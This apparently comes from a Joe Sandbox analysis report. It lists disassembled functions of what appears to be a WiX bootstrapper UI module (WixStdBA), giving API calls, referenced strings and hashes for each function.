Part of subcall function 6C9CA652: GetProcessHeap.KERNEL32(?,?,?,6C9C42E5,?,00000001,?,00000000,?,6C9CB383,?,00000000,?,?,6C9C15F0,WixBundleForcedRestartPackage), ref: 6C9CA663
Part of subcall function 6C9CA652: HeapAlloc.KERNEL32(00000000,?,6C9C42E5,?,00000001,?,00000000,?,6C9CB383,?,00000000,?,?,6C9C15F0,WixBundleForcedRestartPackage,00000074), ref: 6C9CA66A

Strings

thmutil.cpp, xrefs: 6C9C7F82
Image, xrefs: 6C9C7F04

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Heap$AllocFreeProcessString
String ID: Image$thmutil.cpp
API String ID: 2242545887-69592264
Opcode ID: 0479a2f86d057389cdb73692f62f0fc758e21f75c3643594cf9528cc186025e4
Instruction ID: c4f65c26907976fa96370c7de7a43203916ee5fd977a0e758f2bc21a86807704
Opcode Fuzzy Hash: 0479a2f86d057389cdb73692f62f0fc758e21f75c3643594cf9528cc186025e4
Instruction Fuzzy Hash: E0419F76B00A09EBDB05DFA4C880FEE77B9EF84218F204469E411A7650DB71DA45DB12

Function 6C9C68E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 6C9C6A0B

Part of subcall function 6C9CA652: GetProcessHeap.KERNEL32(?,?,?,6C9C42E5,?,00000001,?,00000000,?,6C9CB383,?,00000000,?,?,6C9C15F0,WixBundleForcedRestartPackage), ref: 6C9CA663
Part of subcall function 6C9CA652: HeapAlloc.KERNEL32(00000000,?,6C9C42E5,?,00000001,?,00000000,?,6C9CB383,?,00000000,?,?,6C9C15F0,WixBundleForcedRestartPackage,00000074), ref: 6C9CA66A

SysFreeString.OLEAUT32(?), ref: 6C9C69CC

Strings

Tab|t, xrefs: 6C9C68F1
thmutil.cpp, xrefs: 6C9C6976

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: FreeHeapString$AllocProcess
String ID: Tab|t$thmutil.cpp
API String ID: 3351553325-4153286600
Opcode ID: 7ceca7dd88d3286328d354ae905cb7a23e777c43996bedfd8a58a5e4903885d9
Instruction ID: c89b7d4066fc4011904b2cd5a6e952688eb1ef35dd678100d26ae295ae4d9cda
Opcode Fuzzy Hash: 7ceca7dd88d3286328d354ae905cb7a23e777c43996bedfd8a58a5e4903885d9
Instruction Fuzzy Hash: 3C415972E00219BFDB00AFE4C9C48EDB7B9AB28258B2545B9E955F7600D731DE40CB92

Function 6C9CA44B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C9CA45B
ShellExecuteExW.SHELL32(00000000), ref: 6C9CA499
CloseHandle.KERNEL32(00000000), ref: 6C9CA52A

Strings

<, xrefs: 6C9CA48B

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: CloseExecuteHandleShell_memset
String ID: <
API String ID: 1378689676-4251816714
Opcode ID: 2579c9ef005d18f0f55a447f027b1f52f46a19f8370b0a155299c40c3d8de899
Instruction ID: fa44063856f23131e0d38b46ce6ae61c5748af6ca8ecc7162f784186b1636df4
Opcode Fuzzy Hash: 2579c9ef005d18f0f55a447f027b1f52f46a19f8370b0a155299c40c3d8de899
Instruction Fuzzy Hash: DC318D75F5115ADBDB00CFD8D844A8E7AB8FB05368F608215EC10EBA41DE38CA40CB97

Function 6C9C3980 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C9C39CC
_memset.LIBCMT ref: 6C9C39DE
GetOpenFileNameW.COMDLG32(00000058,?,00000104,?), ref: 6C9C3A57

Strings

X, xrefs: 6C9C3A19

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: _memset$FileNameOpen
String ID: X
API String ID: 1730825344-3081909835
Opcode ID: 901166e2c157ae6aa3230fb3b738c8abc571f8b73f8eeddedafd6a452cf5007a
Instruction ID: fd1a89aa9cc3469ea0ab846a2a55e13a54e8e46ff0b970804e0e463537190c78
Opcode Fuzzy Hash: 901166e2c157ae6aa3230fb3b738c8abc571f8b73f8eeddedafd6a452cf5007a
Instruction Fuzzy Hash: 4D31A9B1A003189BCF20CF69CC49BCAB7F8BF55304F10059AE419AB690C771EA84CF52

Function 6C9C28BF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 6C9C28F1
CompareStringW.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 6C9C2937

Strings

Skipping package: %ls, because it isn't a pre-req package., xrefs: 6C9C2916
Skipping package: %ls, after restart because it was applied before the restart., xrefs: 6C9C2965

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: Skipping package: %ls, after restart because it was applied before the restart.$Skipping package: %ls, because it isn't a pre-req package.
API String ID: 1825529933-1974294762
Opcode ID: f54c17e6e1ab5c5fe59d0d8435f1bb2ef1bf0a6abbc3dc5911b3f7afdb478aaa
Instruction ID: 168587c975dd731f1d371e7ae5e56d80288dc2971a61b166919ac6a42d8b0b85
Opcode Fuzzy Hash: f54c17e6e1ab5c5fe59d0d8435f1bb2ef1bf0a6abbc3dc5911b3f7afdb478aaa
Instruction Fuzzy Hash: DD21C571344A09EFDB018F74CD809EA37A9FB02724F109A29F6369A690C731E941CB53

Function 6C9C7991 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61timeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000000), ref: 6C9C79A4
SetTimer.USER32(?,?,?,00000000), ref: 6C9C79F5
GetLastError.KERNEL32(?,6C9C83C1,?,?,0000FFFF,?,00000000), ref: 6C9C79FF

Strings

thmutil.cpp, xrefs: 6C9C7A24

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ErrorItemLastTimer
String ID: thmutil.cpp
API String ID: 3502022836-2961750086
Opcode ID: 9634211a2384c81b43e3d21f7f4d1710fdafdfb041e471840e83f7cd6cee1932
Instruction ID: 6d3568144774c7bc8bc27c681d2e1fbd0bc0415febfaed0ca6cdac50b3bb76df
Opcode Fuzzy Hash: 9634211a2384c81b43e3d21f7f4d1710fdafdfb041e471840e83f7cd6cee1932
Instruction Fuzzy Hash: 8D110271354612ABD7144E168800A3B37AAEB95311B25C02AF582DBA90EA34D900C773

Function 6C9C4CD8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(000011FF,00000000,?,00000000,?,00000000,?,00000420,?,?,?,?,6C9C2FA2,?,?,00000000), ref: 6C9C4D0A
GetLastError.KERNEL32(?,?,?,?,6C9C2FA2,?,?,00000000), ref: 6C9C4D17
LocalFree.KERNEL32(?,?,?,00000000,?,?,?,?,6C9C2FA2,?,?,00000000), ref: 6C9C4D5E

Strings

strutil.cpp, xrefs: 6C9C4D3C

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: strutil.cpp
API String ID: 1365068426-3612885251
Opcode ID: 97c63d74b4a24dae2c468f883d498ca998f1c4a778eb832a774cc558b5db0736
Instruction ID: 380e62b942430bc48854a11189925c97c0395ed126247db247ad45d9e4e425f5
Opcode Fuzzy Hash: 97c63d74b4a24dae2c468f883d498ca998f1c4a778eb832a774cc558b5db0736
Instruction Fuzzy Hash: 6511A1B2B00514FBDB11AF88CC088EE7A79EF91350F200569F911A6510E370EF40DB62

Function 6C9C5F90 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(6BF00000,6C9C418C), ref: 6C9C5F9A
UnregisterClassW.USER32(ThemeHyperLink,6C9C0000), ref: 6C9C5FB6
InterlockedDecrement.KERNEL32(6C9DD11C), ref: 6C9C999F

Strings

ThemeHyperLink, xrefs: 6C9C5FB1

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ClassDecrementFreeInterlockedLibraryUnregister
String ID: ThemeHyperLink
API String ID: 915346831-4049536123
Opcode ID: 1ca1b679ed776eb4ebedcc2525106ac208f90803c4e3eda332aa1fa3f5e5fe3a
Instruction ID: 7516f682867c10b293a62d2d6801d1e61bf558dfefef07ea0d67c5151aa648e7
Opcode Fuzzy Hash: 1ca1b679ed776eb4ebedcc2525106ac208f90803c4e3eda332aa1fa3f5e5fe3a
Instruction Fuzzy Hash: F6F0F97230DE01EBEF049B79C909B2572BCF75270AF314424E511E1A50D730E5858E77

Function 6C9C1FB6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 6C9C1FC0
DestroyWindow.USER32(?), ref: 6C9C1FD0
UnregisterClassW.USER32(WixStdBA,?), ref: 6C9C1FF5

Strings

WixStdBA, xrefs: 6C9C1FF0

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Window$ClassDestroyUnregister
String ID: WixStdBA
API String ID: 1257303165-3560578689
Opcode ID: f407137cc32c06e5854c6f9d8ae85ffbbe6e2aef9e6cd58bfada39d060eb714b
Instruction ID: a3e8f0801527e2c70334faaa9ee650e7abfbe10934e704ecbc243b3f5d22d053
Opcode Fuzzy Hash: f407137cc32c06e5854c6f9d8ae85ffbbe6e2aef9e6cd58bfada39d060eb714b
Instruction Fuzzy Hash: 37E01A71205F00DFEB215BA4D90DB96BAF4FF41327F50091EE2ABB4060C770A498CB21

Function 6C9C5D47 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,Control,00000000,00000000,00000000,?), ref: 6C9C5D74
GetLastError.KERNEL32 ref: 6C9C5DA0

Part of subcall function 6C9C5951: SysFreeString.OLEAUT32(00000001), ref: 6C9C599C
Part of subcall function 6C9C5951: SysFreeString.OLEAUT32(00000000), ref: 6C9C5A39

Strings

Control, xrefs: 6C9C5D56
locutil.cpp, xrefs: 6C9C5DBD, 6C9C5DEC

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ErrorFreeLastString
String ID: Control$locutil.cpp
API String ID: 3822639702-45981919
Opcode ID: 47a699bf5454a4cf75cad3c95cab6fe0618ddf19ba8b68608bfdcd216bb3ae7d
Instruction ID: 0b143ebf72a231036496fe8f119e6281d937c0e7324adad84dc59016ea2a04ac
Opcode Fuzzy Hash: 47a699bf5454a4cf75cad3c95cab6fe0618ddf19ba8b68608bfdcd216bb3ae7d
Instruction Fuzzy Hash: A7417F70B0470ABFEB009FA5CC84AAA77B8FF54348F204569E815DBA40DB34EA45DB53

Function 6C9C5BE6 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,String,00000000,00000000,00000000,?), ref: 6C9C5C13
GetLastError.KERNEL32 ref: 6C9C5C3F

Part of subcall function 6C9C5878: SysFreeString.OLEAUT32(00000001), ref: 6C9C58C6
Part of subcall function 6C9C5878: CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,yes,000000FF,00000000,Overridable,00000001,00000000,00000000,00000001), ref: 6C9C58F7
Part of subcall function 6C9C5878: SysFreeString.OLEAUT32(00000001), ref: 6C9C5910
Part of subcall function 6C9C5878: SysFreeString.OLEAUT32(00000001), ref: 6C9C5942

Strings

String, xrefs: 6C9C5BF5
locutil.cpp, xrefs: 6C9C5C5C, 6C9C5C8B

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: String$Free$ErrorLast$Compare
String ID: String$locutil.cpp
API String ID: 1911231792-2823821818
Opcode ID: 6820f4695e1eb068e11b5ba3105a737a916e41679c7582d82a6e361ee46a86d2
Instruction ID: 168af04b6fdc68f207b114376d961c860a29cd66d58005e4d94582e2d25249ae
Opcode Fuzzy Hash: 6820f4695e1eb068e11b5ba3105a737a916e41679c7582d82a6e361ee46a86d2
Instruction Fuzzy Hash: BF418670B4070AABEB00DFA5CD84AAE77BCEF54348F208469E815DBA50D734DA45DB53

Function 6C9D20D4 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6C9D2108
__isleadbyte_l.LIBCMT ref: 6C9D213B
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 6C9D216C
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,?,?,?,?,00000000), ref: 6C9D21DA

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 85cb9201bd5ff69ea1e26b485bfc4d89c95aa5d409e69f6cf01014267c43af01
Instruction ID: 8ea09671ee1f91c2fc6d5a1d5017bb2f5d59ecabba86123f1d72915bfc1743b7
Opcode Fuzzy Hash: 85cb9201bd5ff69ea1e26b485bfc4d89c95aa5d409e69f6cf01014267c43af01
Instruction Fuzzy Hash: AF31E531A05A45EFDB10CF64CC88AAE3BB9FF01314F26C5A9E560AB590D730EE40DB51

Function 6C9C80A6 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 6C9C80B7
CloseWindow.USER32(00000000), ref: 6C9C80C4
DeleteObject.GDI32(?), ref: 6C9C80EF
DeleteObject.GDI32(?), ref: 6C9C8115

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: DeleteObjectWindow$Close
String ID:
API String ID: 899310130-0
Opcode ID: 44f984c5071cf375be3b3b357a9018e9f1b6975099abb77b0a3621023036d0d0
Instruction ID: 6bc2437d9067479c12848d7dcd58bf21ad3997e8229f68cf5a8718c6bf1a51ab
Opcode Fuzzy Hash: 44f984c5071cf375be3b3b357a9018e9f1b6975099abb77b0a3621023036d0d0
Instruction Fuzzy Hash: 90316F31B01B01DFEB258E75C89486B73EDFB50749321482AE5A2D3E20CB30F5468B27

Function 6C9C9FA8 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 6C9C9FBB
VariantInit.OLEAUT32(?), ref: 6C9C9FC7
VariantClear.OLEAUT32(?), ref: 6C9CA03B
SysFreeString.OLEAUT32(00000000), ref: 6C9CA046

Part of subcall function 6C9C9B4C: SysAllocString.OLEAUT32(?), ref: 6C9C9B61

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: String$AllocVariant$ClearFreeInit
String ID:
API String ID: 347726874-0
Opcode ID: afb4f0895d1a063e4a06881b4ef4210bcc541e433e4bba6733e9048edf2f0bd2
Instruction ID: 17ea87eab0f6f40e1ea57e2a70b03f4958a522cf47c01c5d51d3f75419e7aa76
Opcode Fuzzy Hash: afb4f0895d1a063e4a06881b4ef4210bcc541e433e4bba6733e9048edf2f0bd2
Instruction Fuzzy Hash: BC213D71B01619EFDF00DBA4C888AAEBB7CEF46799F104554E902EB250DB31DE41CB91

Function 6C9C7905 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,?), ref: 6C9C794F
SetBkColor.GDI32(?,?), ref: 6C9C7960
SetBkMode.GDI32(?,00000001), ref: 6C9C7975
GetStockObject.GDI32(00000005), ref: 6C9C797D

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: f7035feb9e60dede9d6856d849720e6b9fe2999db3f7109a13d5405a13c60d1d
Instruction ID: 94d84bbb84f858e6ab29d53d829b8d569621e0a27d443e612e2a6c91261b891a
Opcode Fuzzy Hash: f7035feb9e60dede9d6856d849720e6b9fe2999db3f7109a13d5405a13c60d1d
Instruction Fuzzy Hash: B711A772705615DFCB108E98C880859B7BDFB093287214729EA7567990C331EC55CBA3

Function 6C9CBC37 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6C9CBC51

Part of subcall function 6C9CE067: __FF_MSGBANNER.LIBCMT ref: 6C9CE080
Part of subcall function 6C9CE067: __NMSG_WRITE.LIBCMT ref: 6C9CE087
Part of subcall function 6C9CE067: HeapAlloc.KERNEL32(00000000,00000001,?,00000000,?,?,6C9CBC56,?), ref: 6C9CE0AC

std::exception::exception.LIBCMT ref: 6C9CBC86
std::exception::exception.LIBCMT ref: 6C9CBCA0
__CxxThrowException@8.LIBCMT ref: 6C9CBCB1

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: std::exception::exception$AllocException@8HeapThrow_malloc
String ID:
API String ID: 1414122017-0
Opcode ID: df19b6df8c416dfe1ff7db3659c8fdfa3aafe0e1b8c641b63af1dd067f9292aa
Instruction ID: d985437fced4d276e891659a1d67a3eed31c9d302d5faa2967dfa14fe9670369
Opcode Fuzzy Hash: df19b6df8c416dfe1ff7db3659c8fdfa3aafe0e1b8c641b63af1dd067f9292aa
Instruction Fuzzy Hash: 2BF0F932744619AADB08DF58CD02A9D37BDAF61318F254015E415B6B80CF70E744CBE3

Function 6C9C152B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

Part of subcall function 6C9C14D4: InitializeCriticalSection.KERNEL32(00000014,?,00000000,?,6C9C1547,?,?,00000003,00000BB8,?,00000000,?,00000000,00000000,?,6C9C3E1D), ref: 6C9C1507

_memcpy_s.LIBCMT ref: 6C9C155E

Strings

WixBundleInstalled, xrefs: 6C9C1583
WixBundleForcedRestartPackage, xrefs: 6C9C15E6

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: CriticalInitializeSection_memcpy_s
String ID: WixBundleForcedRestartPackage$WixBundleInstalled
API String ID: 2827065295-1131346564
Opcode ID: afb4cabb68926ceb0575a7ec2084ce8eb9444ba503731ce81c9f04375d0b6141
Instruction ID: d111382c3405b9bfedc271e016902100ebcce958cf87c9632acc472916ae0000
Opcode Fuzzy Hash: afb4cabb68926ceb0575a7ec2084ce8eb9444ba503731ce81c9f04375d0b6141
Instruction Fuzzy Hash: F25136B0A01B45DFE721CF6AC58078AFBF4FB09304F60492ED6AA96A50D770E480CF56

Function 6C9C6F4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000044B,00000000,?), ref: 6C9C6FA1

Part of subcall function 6C9CA44B: _memset.LIBCMT ref: 6C9CA45B
Part of subcall function 6C9CA44B: ShellExecuteExW.SHELL32(00000000), ref: 6C9CA499
Part of subcall function 6C9CA44B: CloseHandle.KERNEL32(00000000), ref: 6C9CA52A

SetCursor.USER32(?,?), ref: 6C9C6FCA

Strings

open, xrefs: 6C9C6FB2

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
